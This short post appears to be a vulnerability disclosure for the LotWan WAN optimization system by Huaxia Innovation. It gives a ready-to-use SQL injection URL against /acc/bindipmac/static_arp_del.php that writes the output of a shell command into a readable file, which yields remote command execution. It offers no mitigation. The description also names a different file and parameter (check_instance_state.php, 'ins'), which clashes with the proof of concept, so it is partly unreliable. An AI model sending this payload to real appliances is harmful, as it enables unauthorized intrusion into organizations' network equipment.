Huaxia Innovation Lotwan Wan Optimization System Static_arp_del Php Sql Injection Vulnerability
Huaxia Innovation Lotwan Wan Optimization System Static_arp_del Php Sql Injection Vulnerability
Huaxia Innovation LotWan WAN Optimization System Static_arp_del.php SQL Injection Vulnerability
Vulnerability Description
Huaxia Innovation LotWan WAN optimization system check_instance_state.php file parameters ins have command splicing, resulting in remote command execution vulnerabilities
Vulnerability Impact
Huaxia Innovation LotWan WAN Optimization System
Network surveying and mapping
Vulnerability reappears
Login page
The file with vulnerability is static_arp_del.php, written to the file through union injection
1
/acc/bindipmac/static_arp_del.php?x=1&arpName=1' and 0 union select 1,'||id>cmd.txt||',3,4,5,6,7,8--
Visit /acc/bindipmac/cmd.txt again
This post is licensed under CC BY 4.0 by the author.